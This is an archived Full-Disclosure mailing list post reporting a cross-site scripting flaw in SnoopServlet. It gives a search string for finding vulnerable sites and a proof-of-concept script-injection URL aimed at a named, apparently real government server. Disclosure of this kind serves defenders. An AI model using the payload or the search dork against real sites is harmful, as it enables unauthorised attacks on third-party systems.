[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] SnoopServlet vuln to xss

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] SnoopServlet vuln to xss
From: Saleh <q8mosfet@xxxxxxxxx>
Date: Sat, 02 Jul 2011 11:24:41 +0300

SnoopServlet simply echos back the request line and the headers that 
were sent by the client, plus any HTTPS information.

Search Google for: j2ee/servlet/snoopservlet to find a lot of vuln sites.

PoC: 
http://apad1.aduana.gob.bo:7777/j2ee/servlet/SnoopServlet/%3Cscript%3Ealert%28%27bo9lo7%27%29%3C/script%3E

-- 
Saleh Alsanad
PACI computer engineer
q8mosfet@xxxxxxxxx
I'm an FSF member -- Help us support software freedom! 
http://www.fsf.org/jf?referrer=2442

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] WebSurgery v0.5 - web app testing
Next by Date: [Full-disclosure] security in 2011
Previous by thread: [Full-disclosure] WebSurgery v0.5 - web app testing
Next by thread: [Full-disclosure] security in 2011
Index(es):
- Date
- Thread